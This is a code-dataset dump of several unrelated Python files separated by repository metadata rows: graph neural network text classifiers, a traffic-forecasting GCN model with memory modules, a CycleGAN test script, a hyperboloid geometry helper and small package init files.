from ..layers.scalable_graphlearn import AnchorGraphLearner
from ..layers.anchor import AnchorGCN
from ..layers.common import dropout, EncoderRNN
from ..layers.gnn import GCN, GAT
from ..utils.generic_utils import to_cuda, create_mask, batch_normalize_adj
from ..utils.constants import VERY_SMALL_NUMBER
class TextGraphRegression(nn.Module):
def __init__(self, config, w_embedding, word_vocab):
super(TextGraphRegression, self).__init__()
self.config = config
self.name = 'TextGraphRegression'
self.device = config['device']
# Shape
word_embed_dim = config['word_embed_dim']
hidden_size = config['hidden_size']
# Dropout
self.dropout = config['dropout']
self.word_dropout = config.get('word_dropout', config['dropout'])
self.rnn_dropout = config.get('rnn_dropout', config['dropout'])
# Graph
self.graph_learn = config['graph_learn']
self.graph_metric_type = config['graph_metric_type']
self.graph_module = config['graph_module']
self.graph_skip_conn = config['graph_skip_conn']
self.graph_include_self = config.get('graph_include_self', True)
# Text
self.word_embed = w_embedding
if config['fix_vocab_embed']:
print('[ Fix word embeddings ]')
for param in self.word_embed.parameters():
param.requires_grad = False
self.ctx_rnn_encoder = EncoderRNN(word_embed_dim, hidden_size, bidirectional=True, num_layers=1, rnn_type='lstm',
rnn_dropout=self.rnn_dropout, device=self.device)
self.linear_out = nn.Linear(hidden_size, 1, bias=False)
self.scalable_run = config.get('scalable_run', False)
if not config.get('no_gnn', False):
print('[ Using TextGNN ]')
if self.graph_module == 'gcn':
gcn_module = AnchorGCN if self.scalable_run else GCN
self.encoder = gcn_module(nfeat=hidden_size,
nhid=hidden_size,
nclass=hidden_size,
graph_hops=config.get('graph_hops', 2),
dropout=self.dropout,
batch_norm=config.get('batch_norm', False))
else:
raise RuntimeError('Unknown graph_module: {}'.format(self.graph_module))
if self.graph_learn:
graph_learn_fun = AnchorGraphLearner if self.scalable_run else GraphLearner
self.graph_learner = graph_learn_fun(word_embed_dim, config['graph_learn_hidden_size'],
topk=config['graph_learn_topk'],
epsilon=config['graph_learn_epsilon'],
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
self.graph_learner2 = graph_learn_fun(hidden_size,
config.get('graph_learn_hidden_size2', config['graph_learn_hidden_size']),
topk=config.get('graph_learn_topk2', config['graph_learn_topk']),
epsilon=config.get('graph_learn_epsilon2', config['graph_learn_epsilon']),
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
print('[ Graph Learner ]')
if config['graph_learn_regularization']:
print('[ Graph Regularization]')
else:
self.graph_learner = None
self.graph_learner2 = None
else:
print('[ Using RNN ]')
def compute_no_gnn_output(self, context, context_lens):
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[1][0].squeeze(0)
output = self.linear_out(context_vec).squeeze(-1)
return torch.sigmoid(output)
def learn_graph(self, graph_learner, node_features, graph_skip_conn=None, node_mask=None, anchor_mask=None, graph_include_self=False, init_adj=None, anchor_features=None):
if self.graph_learn:
if self.scalable_run:
node_anchor_adj = graph_learner(node_features, anchor_features, node_mask, anchor_mask)
return node_anchor_adj
else:
raw_adj = graph_learner(node_features, node_mask)
if self.graph_metric_type in ('kernel', 'weighted_cosine'):
assert raw_adj.min().item() >= 0
adj = raw_adj / torch.clamp(torch.sum(raw_adj, dim=-1, keepdim=True), min=VERY_SMALL_NUMBER)
elif self.graph_metric_type == 'cosine':
adj = (raw_adj > 0).float()
adj = normalize_adj(adj)
else:
adj = torch.softmax(raw_adj, dim=-1)
if graph_skip_conn in (0, None):
if graph_include_self:
adj = adj + to_cuda(torch.eye(adj.size(0)), self.device)
else:
adj = graph_skip_conn * init_adj + (1 - graph_skip_conn) * adj
return raw_adj, adj
else:
raw_adj = None
adj = init_adj
return raw_adj, adj
def compute_output(self, node_vec, node_mask=None):
graph_vec = self.graph_maxpool(node_vec.transpose(-1, -2), node_mask=node_mask)
output = self.linear_out(graph_vec).squeeze(-1)
return torch.sigmoid(output)
def prepare_init_graph(self, context, context_lens):
context_mask = create_mask(context_lens, context.size(-1), device=self.device)
# Shape: [batch_size, max_length, word_embed_dim]
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, max_length, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[0].transpose(0, 1)
init_adj = self.compute_init_adj(raw_context_vec.detach(), self.config['input_graph_knn_size'], mask=context_mask)
return raw_context_vec, context_vec, context_mask, init_adj
def graph_maxpool(self, node_vec, node_mask=None):
# Maxpool
# Shape: (batch_size, hidden_size, num_nodes)
graph_embedding = F.max_pool1d(node_vec, kernel_size=node_vec.size(-1)).squeeze(-1)
return graph_embedding
def compute_init_adj(self, features, knn_size, mask=None):
adj = get_binarized_kneighbors_graph(features, knn_size, mask=mask, device=self.device)
adj_norm = batch_normalize_adj(adj, mask=mask)
return adj_norm
class TextGraphClf(nn.Module):
def __init__(self, config, w_embedding, word_vocab):
super(TextGraphClf, self).__init__()
self.config = config
self.name = 'TextGraphClf'
self.device = config['device']
# Shape
word_embed_dim = config['word_embed_dim']
hidden_size = config['hidden_size']
nclass = 20
# Dropout
self.dropout = config['dropout']
self.word_dropout = config.get('word_dropout', config['dropout'])
self.rnn_dropout = config.get('rnn_dropout', config['dropout'])
# Graph
self.graph_learn = config['graph_learn']
self.graph_metric_type = config['graph_metric_type']
self.graph_module = config['graph_module']
self.graph_skip_conn = config['graph_skip_conn']
self.graph_include_self = config.get('graph_include_self', True)
# Text
self.word_embed = w_embedding
if config['fix_vocab_embed']:
print('[ Fix word embeddings ]')
for param in self.word_embed.parameters():
param.requires_grad = False
self.ctx_rnn_encoder = EncoderRNN(word_embed_dim, hidden_size, bidirectional=True, num_layers=1, rnn_type='lstm',
rnn_dropout=self.rnn_dropout, device=self.device)
self.linear_out = nn.Linear(hidden_size, nclass, bias=False)
self.scalable_run = config.get('scalable_run', False)
if not config.get('no_gnn', False):
print('[ Using TextGNN ]')
# self.linear_max = nn.Linear(hidden_size, nclass, bias=False)
if self.graph_module == 'gcn':
gcn_module = AnchorGCN if self.scalable_run else GCN
self.encoder = gcn_module(nfeat=hidden_size,
nhid=hidden_size,
nclass=hidden_size,
graph_hops=config.get('graph_hops', 2),
dropout=self.dropout,
batch_norm=config.get('batch_norm', False))
else:
raise RuntimeError('Unknown graph_module: {}'.format(self.graph_module))
if self.graph_learn:
graph_learn_fun = AnchorGraphLearner if self.scalable_run else GraphLearner
self.graph_learner = graph_learn_fun(word_embed_dim, config['graph_learn_hidden_size'],
topk=config['graph_learn_topk'],
epsilon=config['graph_learn_epsilon'],
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
self.graph_learner2 = graph_learn_fun(hidden_size,
config.get('graph_learn_hidden_size2', config['graph_learn_hidden_size']),
topk=config.get('graph_learn_topk2', config['graph_learn_topk']),
epsilon=config.get('graph_learn_epsilon2', config['graph_learn_epsilon']),
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
print('[ Graph Learner ]')
if config['graph_learn_regularization']:
print('[ Graph Regularization]')
else:
self.graph_learner = None
self.graph_learner2 = None
else:
print('[ Using RNN ]')
def compute_no_gnn_output(self, context, context_lens):
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[1][0].squeeze(0)
output = self.linear_out(context_vec)
output = F.log_softmax(output, dim=-1)
return output
def learn_graph(self, graph_learner, node_features, graph_skip_conn=None, node_mask=None, anchor_mask=None, graph_include_self=False, init_adj=None, anchor_features=None):
if self.graph_learn:
if self.scalable_run:
node_anchor_adj = graph_learner(node_features, anchor_features, node_mask, anchor_mask)
return node_anchor_adj
else:
raw_adj = graph_learner(node_features, node_mask)
if self.graph_metric_type in ('kernel', 'weighted_cosine'):
assert raw_adj.min().item() >= 0
adj = raw_adj / torch.clamp(torch.sum(raw_adj, dim=-1, keepdim=True), min=VERY_SMALL_NUMBER)
elif self.graph_metric_type == 'cosine':
adj = (raw_adj > 0).float()
adj = normalize_adj(adj)
else:
adj = torch.softmax(raw_adj, dim=-1)
if graph_skip_conn in (0, None):
if graph_include_self:
adj = adj + to_cuda(torch.eye(adj.size(0)), self.device)
else:
adj = graph_skip_conn * init_adj + (1 - graph_skip_conn) * adj
return raw_adj, adj
else:
raw_adj = None
adj = init_adj
return raw_adj, adj
def compute_output(self, node_vec, node_mask=None):
graph_vec = self.graph_maxpool(node_vec.transpose(-1, -2), node_mask=node_mask)
output = self.linear_out(graph_vec)
output = F.log_softmax(output, dim=-1)
return output
def prepare_init_graph(self, context, context_lens):
context_mask = create_mask(context_lens, context.size(-1), device=self.device)
# Shape: [batch_size, max_length, word_embed_dim]
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, max_length, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[0].transpose(0, 1)
init_adj = self.compute_init_adj(raw_context_vec.detach(), self.config['input_graph_knn_size'], mask=context_mask)
return raw_context_vec, context_vec, context_mask, init_adj
def graph_maxpool(self, node_vec, node_mask=None):
# Maxpool
# Shape: (batch_size, hidden_size, num_nodes)
graph_embedding = F.max_pool1d(node_vec, kernel_size=node_vec.size(-1)).squeeze(-1)
return graph_embedding
def compute_init_adj(self, features, knn_size, mask=None):
adj = get_binarized_kneighbors_graph(features, knn_size, mask=mask, device=self.device)
adj_norm = batch_normalize_adj(adj, mask=mask)
return adj_norm
| 43.614925
| 175
| 0.589556
| 1,690
| 14,611
| 4.766272
| 0.090533
| 0.047176
| 0.039727
| 0.016884
| 0.939168
| 0.939168
| 0.939168
| 0.926381
| 0.919926
| 0.919926
| 0
| 0.006315
| 0.317158
| 14,611
| 334
| 176
| 43.745509
| 0.801042
| 0.031894
| 0
| 0.900433
| 0
| 0
| 0.094089
| 0.013593
| 0
| 0
| 0
| 0
| 0.008658
| 1
| 0.060606
| false
| 0
| 0.04329
| 0
| 0.181818
| 0.04329
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
59c8b2e7c73027dfe9e42947b83877f9503d970a
| 97
|
py
|
Python
|
workplace_extractor/__init__.py
|
denisduarte/workplace_extractor
|
722fcaa535aea38c22985c887d0647ba664d7a5f
|
[
"MIT"
] | null | null | null |
workplace_extractor/__init__.py
|
denisduarte/workplace_extractor
|
722fcaa535aea38c22985c887d0647ba664d7a5f
|
[
"MIT"
] | null | null | null |
workplace_extractor/__init__.py
|
denisduarte/workplace_extractor
|
722fcaa535aea38c22985c887d0647ba664d7a5f
|
[
"MIT"
] | 1
|
2021-11-17T16:29:40.000Z
|
2021-11-17T16:29:40.000Z
|
from workplace_extractor.Extractor import Extractor
from workplace_extractor.Extractor import run
| 48.5
| 51
| 0.907216
| 12
| 97
| 7.166667
| 0.416667
| 0.302326
| 0.511628
| 0.72093
| 0.860465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072165
| 97
| 2
| 52
| 48.5
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
ab7445cc2320dbd1e07c469275c9c3521946198b
| 233
|
py
|
Python
|
release_manager/__init__.py
|
snowplow/release-manager
|
72a82cf9705d4e299e97e4aecd25f4c19bfcba59
|
[
"Apache-2.0"
] | 9
|
2016-09-13T09:47:42.000Z
|
2021-05-27T14:26:04.000Z
|
release_manager/__init__.py
|
snowplow/release-manager
|
72a82cf9705d4e299e97e4aecd25f4c19bfcba59
|
[
"Apache-2.0"
] | 37
|
2016-09-13T04:14:39.000Z
|
2019-03-19T13:24:02.000Z
|
release_manager/__init__.py
|
snowplow/release-manager
|
72a82cf9705d4e299e97e4aecd25f4c19bfcba59
|
[
"Apache-2.0"
] | 2
|
2017-03-26T00:20:35.000Z
|
2020-06-17T02:57:42.000Z
|
"""release_manager: __init__.py declaration"""
import release_manager.targets
import release_manager.__main__
import release_manager._version
import release_manager.logger
import release_manager.package
import release_manager.utils
| 25.888889
| 46
| 0.871245
| 29
| 233
| 6.448276
| 0.413793
| 0.524064
| 0.641711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06867
| 233
| 8
| 47
| 29.125
| 0.861751
| 0.171674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
abf6148c6713211940fd6fbd85b41121176136d1
| 740
|
py
|
Python
|
example/test/core/geometry/simple/hyperboloid/unit.py
|
dmilos/IceRay
|
4e01f141363c0d126d3c700c1f5f892967e3d520
|
[
"MIT-0"
] | 2
|
2020-09-04T12:27:15.000Z
|
2022-01-17T14:49:40.000Z
|
example/test/core/geometry/simple/hyperboloid/unit.py
|
dmilos/IceRay
|
4e01f141363c0d126d3c700c1f5f892967e3d520
|
[
"MIT-0"
] | null | null | null |
example/test/core/geometry/simple/hyperboloid/unit.py
|
dmilos/IceRay
|
4e01f141363c0d126d3c700c1f5f892967e3d520
|
[
"MIT-0"
] | 1
|
2020-09-04T12:27:52.000Z
|
2020-09-04T12:27:52.000Z
|
import math
import IceRayCpp
def name( ):
return "hyperboloid"
def cone( P_core = 0 ):
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def cylinder( P_core = 1 ):
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def sphere( P_core = math.sqrt(2) ):
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def negative( P_core = -0.5 ): # double side
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def nuke( P_core = 0.5 ): # single side.
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
| 27.407407
| 61
| 0.660811
| 81
| 740
| 5.91358
| 0.308642
| 0.104384
| 0.438413
| 0.448852
| 0.720251
| 0.720251
| 0.720251
| 0.720251
| 0.720251
| 0
| 0
| 0.012324
| 0.232432
| 740
| 26
| 62
| 28.461538
| 0.830986
| 0.032432
| 0
| 0.526316
| 0
| 0
| 0.04519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.315789
| false
| 0
| 0.105263
| 0.052632
| 0.473684
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2802de2cdcfde6212d0c2f4bd544744f4ab744c3
| 1,407
|
py
|
Python
|
produce_image_for_inception_score.py
|
raph-m/pytorch-CycleGAN-and-pix2pix
|
41891a12fb4f92ebef60e82fe533110c2d5a6311
|
[
"BSD-3-Clause"
] | null | null | null |
produce_image_for_inception_score.py
|
raph-m/pytorch-CycleGAN-and-pix2pix
|
41891a12fb4f92ebef60e82fe533110c2d5a6311
|
[
"BSD-3-Clause"
] | null | null | null |
produce_image_for_inception_score.py
|
raph-m/pytorch-CycleGAN-and-pix2pix
|
41891a12fb4f92ebef60e82fe533110c2d5a6311
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
from utils import celeba_pix2pix_params, celeba_cycle_params
from utils import set_argv
from options.test_options import TestOptions
from test import test
if __name__ == "__main__":
first_arg = sys.argv[0]
"""
current_params = celeba_pix2pix_params.copy()
current_params["epoch"] = "5"
current_params["num_test"] = "10000"
current_params["dataroot"] = "my_data/celeba"
current_params["results_dir"] = "inception_results_epoch5"
current_params["dataset_mode"] = "unaligned"
sys.argv = set_argv(current_params, first_arg)
opt = TestOptions().parse()
test(opt)
current_params = celeba_pix2pix_params.copy()
current_params["epoch"] = "10"
current_params["num_test"] = "10000"
current_params["dataroot"] = "my_data/celeba"
current_params["results_dir"] = "inception_results"
current_params["dataset_mode"] = "unaligned"
sys.argv = set_argv(current_params, first_arg)
opt = TestOptions().parse()
test(opt)
"""
current_params = celeba_cycle_params.copy()
current_params["epoch"] = "5" # TODO: check this
current_params["num_test"] = "10000"
current_params["dataroot"] = "my_data/celeba"
current_params["results_dir"] = "inception_results_epoch5"
current_params["dataset_mode"] = "unaligned"
sys.argv = set_argv(current_params, first_arg)
opt = TestOptions().parse()
test(opt)
| 32.72093
| 62
| 0.705046
| 174
| 1,407
| 5.327586
| 0.235632
| 0.294498
| 0.061489
| 0.074434
| 0.800432
| 0.800432
| 0.768069
| 0.768069
| 0.768069
| 0.67206
| 0
| 0.021368
| 0.168444
| 1,407
| 42
| 63
| 33.5
| 0.77094
| 0.011372
| 0
| 0
| 0
| 0
| 0.171289
| 0.039152
| 0
| 0
| 0
| 0.02381
| 0
| 1
| 0
| false
| 0
| 0.3125
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
2803829e9e7142422f9e9cf1901b1824cd147a21
| 18,625
|
py
|
Python
|
models/model.py
|
GCN-M/GCN-M
|
2f099706fa6a4c88ca804729865acf2334116005
|
[
"Apache-2.0"
] | null | null | null |
models/model.py
|
GCN-M/GCN-M
|
2f099706fa6a4c88ca804729865acf2334116005
|
[
"Apache-2.0"
] | null | null | null |
models/model.py
|
GCN-M/GCN-M
|
2f099706fa6a4c88ca804729865acf2334116005
|
[
"Apache-2.0"
] | null | null | null |
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils.masking import TriangularCausalMask, ProbMask
import data.dcrnn_utils as dcrnn_utils
from models.encoder import Encoder, EncoderLayer, ConvLayer, EncoderStack
from models.decoder import Decoder, DecoderLayer
from models.attn import FullAttention, ProbAttention, AttentionLayer
from models.embed import DataEmbedding
from models.gnn import gcn, gcn_gwnet, gcn_gcnm_dynamic, spatialGCN
from models.memoryModule import LocalFeatureModule, MemoryModule
class GCNM(nn.Module):
def __init__(self, device, num_nodes, dropout=0.3, supports=None, gcn_bool=True, addaptadj=True, aptinit=None, in_dim=2, out_dim=12,residual_channels=32,dilation_channels=32,skip_channels=256,end_channels=512,kernel_size=2,blocks=4,layers=2):
"""
full_data: full dataset including dateTime
in_dim: the input data dimension (i.e., node numbers)
"""
super(GCNM, self).__init__()
self.local_feature_model = LocalFeatureModule(num_nodes)
self.memory_model = MemoryModule(in_dim, residual_channels)
self.dropout = dropout
self.blocks = blocks
self.layers = layers
self.gcn_bool = gcn_bool
self.addaptadj = addaptadj
self.filter_convs = nn.ModuleList()
self.gate_convs = nn.ModuleList()
self.residual_convs = nn.ModuleList()
self.skip_convs = nn.ModuleList()
self.bn = nn.ModuleList()
self.gconv = nn.ModuleList()
##s to check if we still need "start_conv"???
self.start_conv = nn.Conv2d(in_channels=in_dim,
out_channels=residual_channels,
kernel_size=(1, 1))
self.supports = supports
receptive_field = 1
self.supports_len = 0
if supports is not None:
self.supports_len += len(supports)
if gcn_bool and addaptadj:
if aptinit is None:
if supports is None:
self.supports = []
self.nodevec1 = nn.Parameter(torch.randn(num_nodes, 10).to(device), requires_grad=True).to(device)
self.nodevec2 = nn.Parameter(torch.randn(10, num_nodes).to(device), requires_grad=True).to(device)
self.supports_len += 1
else:
if supports is None:
self.supports = []
m, p, n = torch.svd(aptinit)
initemb1 = torch.mm(m[:, :10], torch.diag(p[:10] ** 0.5))
initemb2 = torch.mm(torch.diag(p[:10] ** 0.5), n[:, :10].t())
self.nodevec1 = nn.Parameter(initemb1, requires_grad=True).to(device)
self.nodevec2 = nn.Parameter(initemb2, requires_grad=True).to(device)
self.supports_len += 1
for b in range(blocks):
additional_scope = kernel_size - 1
new_dilation = 1
for i in range(layers):
# dilated convolutions
self.filter_convs.append(nn.Conv2d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1,kernel_size),dilation=new_dilation))
self.gate_convs.append(nn.Conv1d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1, kernel_size), dilation=new_dilation))
# 1x1 convolution for residual connection
self.residual_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=residual_channels,
kernel_size=(1, 1)))
# 1x1 convolution for skip connection
self.skip_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=skip_channels,
kernel_size=(1, 1)))
self.bn.append(nn.BatchNorm2d(residual_channels))
new_dilation *=2
receptive_field += additional_scope
additional_scope *= 2
if self.gcn_bool:
self.gconv.append(gcn_gwnet(dilation_channels,residual_channels,dropout,support_len=self.supports_len))
self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,
out_channels=end_channels,
kernel_size=(1,1),
bias=True)
self.end_conv_2 = nn.Conv2d(in_channels=end_channels,
out_channels=out_dim,
kernel_size=(1,1),
bias=True)
self.receptive_field = receptive_field
def forward(self, input, x_hist):
"""
:param input: (B, 8, L, D)
:param x_hist: (B, n*tau, L, D)
:return: e: enrichied traffic embedding (B, L, D)
"""
z = self.local_feature_model(input) #(B, L, D)
z = torch.unsqueeze(z, dim=-1) # (B, L, D) -> (B, L, D, 1)
x_hist = torch.unsqueeze(x_hist, dim=-1)#(B, n*tau, L, D, 1)
x_hist = x_hist.transpose(1, 2).contiguous() #(B, L, n*tau, D, F)
#(B, L, D, F), (B, L, n*tau, D, F)
e = self.memory_model(z, x_hist) # (B, L, D, F), (B, L, n*tau, D, F) -> (B, F', L, D)
input = e.permute(0, 1, 3, 2).contiguous() #(B, F', D, L)
"""
# the input is from the enriched temporal embedding
# input: temporal embedding (N, 1, D, L)
"""
in_len = input.size(3) # (N, F, D, L), here F=1
if in_len < self.receptive_field: # receptive_filed = 12 + 1
x = nn.functional.pad(input, (self.receptive_field - in_len, 0, 0, 0)) # (N, F, D, L+1)
else:
x = input
#x = self.start_conv(x) # kernel=(1,1), (N, 1, D, L+1) -> (N, 1, D, L+1)
skip = 0
# calculate the current adaptive adj matrix once per iteration
new_supports = None
if self.gcn_bool and self.addaptadj and self.supports is not None:
adp = F.softmax(F.relu(torch.mm(self.nodevec1, self.nodevec2)), dim=1)
new_supports = self.supports + [adp]
# WaveNet layers
for i in range(self.blocks * self.layers):
residual = x
# dilated convolution
filter = self.filter_convs[i](residual) # kernel=(1, 2)
filter = torch.tanh(filter)
gate = self.gate_convs[i](residual) # kernel=(1,2)
gate = torch.sigmoid(gate)
# x=filter=gate: (B, residual_size, D, F)
x = filter * gate
# parametrized skip connection
s = x
s = self.skip_convs[i](s)
try:
skip = skip[:, :, :, -s.size(3):]
except:
skip = 0
skip = s + skip
if self.gcn_bool and self.supports is not None:
if self.addaptadj:
# x: (B, residual_size, D, F)
#print("input.shape 1 is {}".format(x.size()))
x = self.gconv[i](x, new_supports)
#print("input.shape 2 is {}".format(x.size()))
else:
x = self.gconv[i](x, self.supports)
else:
x = self.residual_convs[i](x)
x = x + residual[:, :, :, -x.size(3):]
x = self.bn[i](x)
x = F.relu(skip)
x = F.relu(self.end_conv_1(x))
x = self.end_conv_2(x) # [N, L, D, 1]
x = torch.squeeze(x, dim=-1) # [N, L, D]
return x.contiguous()
class GCNMdynamic(nn.Module):
def __init__(self, device, num_nodes, dropout=0.3, supports=None, gcn_bool=True, addaptadj=True, aptinit=None, in_dim=2, out_dim=12,residual_channels=32,dilation_channels=32,skip_channels=256,end_channels=512,kernel_size=2,blocks=4,layers=2):
"""
full_data: full dataset including dateTime
in_dim: the input data dimension (i.e., node numbers)
"""
super(GCNMdynamic, self).__init__()
self.local_feature_model = LocalFeatureModule(num_nodes)
self.memory_model = MemoryModule(in_dim, residual_channels)
self.num_nodes = num_nodes
self.device = device
self.dropout = dropout
self.blocks = blocks
self.layers = layers
self.gcn_bool = gcn_bool
self.addaptadj = addaptadj
self.filter_convs = nn.ModuleList()
self.gate_convs = nn.ModuleList()
self.residual_convs = nn.ModuleList()
self.skip_convs = nn.ModuleList()
self.bn = nn.ModuleList()
self.gconv = nn.ModuleList()
##s to check if we still need "start_conv"???
self.start_conv = nn.Conv2d(in_channels=in_dim,
out_channels=residual_channels,
kernel_size=(1, 1))
self.supports = supports
receptive_field = 1
self.supports_len = 2
#parameters for initializing the static node embeddings
node_dim = residual_channels
self.alpha = 3
self.emb1 = nn.Embedding(self.num_nodes, node_dim)
self.emb2 = nn.Embedding(self.num_nodes, node_dim)
self.lin1 = nn.Linear(node_dim, node_dim)
self.lin2 = nn.Linear(node_dim, node_dim)
self.idx = torch.arange(self.num_nodes).to(self.device)
self.GCN1_1 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
self.GCN1_2 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
self.GCN2_1 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
self.GCN2_2 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
for b in range(blocks):
additional_scope = kernel_size - 1
new_dilation = 1
for i in range(layers):
# dilated convolutions
self.filter_convs.append(nn.Conv2d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1,kernel_size),dilation=new_dilation))
self.gate_convs.append(nn.Conv1d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1, kernel_size), dilation=new_dilation))
# 1x1 convolution for residual connection
self.residual_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=residual_channels,
kernel_size=(1, 1)))
# 1x1 convolution for skip connection
self.skip_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=skip_channels,
kernel_size=(1, 1)))
self.bn.append(nn.BatchNorm2d(residual_channels))
new_dilation *=2
receptive_field += additional_scope
additional_scope *= 2
if self.gcn_bool:
self.gconv.append(gcn_gcnm_dynamic(dilation_channels,residual_channels,dropout,support_len=self.supports_len))
self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,
out_channels=end_channels,
kernel_size=(1,1),
bias=True)
self.end_conv_2 = nn.Conv2d(in_channels=end_channels,
out_channels=out_dim,
kernel_size=(1,1),
bias=True)
self.receptive_field = receptive_field
if out_dim > self.receptive_field:
self.skip0 = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, out_dim), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, out_dim-self.receptive_field+1), bias=True)
else:
self.skip0 = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, self.receptive_field), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, 1), bias=True)
def preprocessing(self, adj):
#adj: (B, L, D, D)
adj = adj + torch.eye(self.num_nodes).to(self.device)
adj = adj / torch.unsqueeze(adj.sum(-1), -1)
return adj
def forward(self, input, x_hist):
"""
:param input: (B, 8, L, D)
:param x_hist: (B, n*tau, L, D)
:return: e: enrichied traffic embedding (B, L, D)
"""
z = self.local_feature_model(input) #(B, L, D)
z = torch.unsqueeze(z, dim=-1) # (B, L, D) -> (B, L, D, 1)
x_hist = torch.unsqueeze(x_hist, dim=-1)#(B, n*tau, L, D, 1)
x_hist = x_hist.transpose(1, 2).contiguous() #(B, L, n*tau, D, F)
#(B, L, D, F), (B, L, n*tau, D, F)
e = self.memory_model(z, x_hist) # (B, L, D, F), (B, L, n*tau, D, F) -> (B, residual_channels, L, D)
input = e.permute(0, 1, 3, 2).contiguous() #(B, F', D, L)
"""
# the input is from the enriched temporal embedding
# input: temporal embedding (N, 1, D, L)
"""
in_len = input.size(3) # (N, F, D, L), here F=1
if in_len < self.receptive_field: # receptive_filed = 12 + 1
x = nn.functional.pad(input, (self.receptive_field - in_len, 0, 0, 0)) # (N, residual_channels, D, L+1)
else:
x = input
#x = self.start_conv(x) # kernel=(1,1), (N, 1, D, L+1) -> (N, 1, D, L+1)
#skip = 0
skip = self.skip0(x)
# calculate the current adaptive adj matrix once per iteration
'''new_supports = None
if self.gcn_bool and self.addaptadj and self.supports is not None:
adp = F.softmax(F.relu(torch.mm(self.nodevec1, self.nodevec2)), dim=1)
new_supports = self.supports + [adp]
'''
# x: (N, residual_channels, D, L), support[i]: (D, D)
